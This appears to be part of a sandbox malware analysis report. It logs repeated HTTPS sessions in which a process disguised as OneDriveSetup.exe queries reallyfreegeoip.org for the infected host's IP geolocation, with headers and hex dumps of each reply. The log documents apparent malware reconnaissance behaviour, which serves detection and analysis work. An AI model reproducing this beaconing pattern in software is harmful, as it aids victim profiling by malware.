                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJrj%2BMSFf6AnTGFTcEZ8g2G963fS3oxZ5Fb5GX3kL5AgiP5iXeVxHjGWdNbKl1zJIpekm3XMKUcS05WTai9AMDUABDAavcM6j8pCOld1g%2FfA%2Fc6Hq92%2B4exwM0RUg63vQbwNubgC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e888888ec1d80d9-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1482&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1933774&cwnd=252&unsent_bytes=0&cid=c82d45225ec9d8ba&ts=471&x=0"
                                                                                                                                                                      2024-11-26 08:33:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.849714172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:25 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      2024-11-26 08:33:25 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:25 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573914
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MHrpi09GclgJh1XQqKVb0lAV%2BxzHUzSxho7q2onoJ9mJeGUMxi3Zj2tkeY9pNFrqltr%2FnuMLavh0SJ1mkuF88agzaFrW6jnK%2Ft4lAQZlWHqGca0PH6MhOWr5HOgnVESGiYuOcUVv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8888967eb95e6e-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2082&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1397797&cwnd=233&unsent_bytes=0&cid=84c8b2565c677693&ts=464&x=0"
                                                                                                                                                                      2024-11-26 08:33:25 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.849716172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:28 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:28 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:28 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573917
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyIO44aieynfAaqDEmbkjXEO3nRWwTCNSAkYbfiwSQ3CuL7U0cQCwqNxNNL8%2Bwcy2l4XmJY7%2B1C7%2By78IH2zm%2F8sThfuGT28hXHajLJogOezekmDwjEtokwRZJYcfhzZ0M5sDnhZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8888aa295a42e6-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1729&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1638608&cwnd=201&unsent_bytes=0&cid=6105c140d962c8f5&ts=450&x=0"
                                                                                                                                                                      2024-11-26 08:33:28 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.849718172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:31 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:31 UTC849INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:31 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573920
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3N6NATHGYfQN8zAItwqmUCbp4StlSCqQasyBQ8yjcVAowiTPL4mzYPHlQelzeSxFF%2Bd0jZybNQ8wdLaX5zEQRg3XUwbYdmCTtMcpEps%2BTDO93RyibYhKJPR8olOZ8PeEcgS66uPG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8888bdc9e2438b-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1851616&cwnd=169&unsent_bytes=0&cid=28fadc946e4db3c0&ts=451&x=0"
                                                                                                                                                                      2024-11-26 08:33:31 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      6192.168.2.849720172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:34 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:35 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:34 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573923
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2Bqp2gtVHmrCqGoe8pV2YVKWC%2BhNPAmKmjo3BmtKPrdhsPplVG5Bk0hyhPg7Ssrs8JyAhHLR6LuxExglkKIQyaZ7J7DrXDvcm0rtMVALyDKhonYZXSa2P1%2FUSJrD8AY9TII3shoi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8888d17ab1238a-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2022&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1424390&cwnd=161&unsent_bytes=0&cid=8219b6150cb87b0e&ts=470&x=0"
                                                                                                                                                                      2024-11-26 08:33:35 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      7192.168.2.849722172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:37 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:38 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:38 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573927
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qX8jeSE7mgkT3TjXScup7eB4QceewbW4zXJvTAZruwxun17utZigu7vmfDUyrRC6CnrWCL1ar%2FynB%2BHijI4dJjX55rvTAe7hLODRssL1%2FJxUPltdGR5U2pLu2c9DZDyDW1ifytlQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8888e4ae8e43be-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1813664&cwnd=217&unsent_bytes=0&cid=965060de31efd7b6&ts=449&x=0"
                                                                                                                                                                      2024-11-26 08:33:38 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      8192.168.2.849724172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:40 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      2024-11-26 08:33:41 UTC849INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:41 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573930
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wW%2BdxRqQY0SzGZszZ46f3rTm5NqyyV7jOdbh2nES08L3aQQB%2Boej78yRtgncLkrxeYhpA08WmtngWw04Kqa5JPvpmgrfaS3NpEl0k5btuhNrqdXOVEQ80XydeiWGyyfg2YIAviH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8888f83a1b4391-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1555&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1828428&cwnd=236&unsent_bytes=0&cid=77d25c2370d76d69&ts=471&x=0"
                                                                                                                                                                      2024-11-26 08:33:41 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      9192.168.2.849726172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:44 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-11-26 08:33:44 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:44 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573933
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1NeLvJkjJ%2FngWbpYwYs8r%2BT08ylSeRIxcRzGaSqUmD1W6aUriewXYN22ZyOKjN3eNedwq%2FvzUU0QyOdQf56v%2FI5rNgWNFosVbpsTIqiMJF3c%2FeXamxkJ9a3DBxsdxoJfBJdT9DH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e88890c49ef78dc-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2083&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1416100&cwnd=174&unsent_bytes=0&cid=b2e098932f2aa5f8&ts=458&x=0"
                                                                                                                                                                      2024-11-26 08:33:44 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      10192.168.2.849728172.67.177.1344437588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:33:47 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                                                                      2024-11-26 08:33:47 UTC849INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:47 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 361
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                      Age: 573936
                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O9ycoNo1Pwmc5QaqWegOsWsuOo8SvVykyqyx1mt4RSq97qSkZjLv53YGZBj6uPZo8cFrTRb6eisieY1%2B8D0XTohVgupH9mHgx1hq9P5i0d7Zgfz1FfNt8PbiiCJuC2Mm693jux%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e88892098768c75-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1899&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1520041&cwnd=208&unsent_bytes=0&cid=347c0f06939129aa&ts=471&x=0"
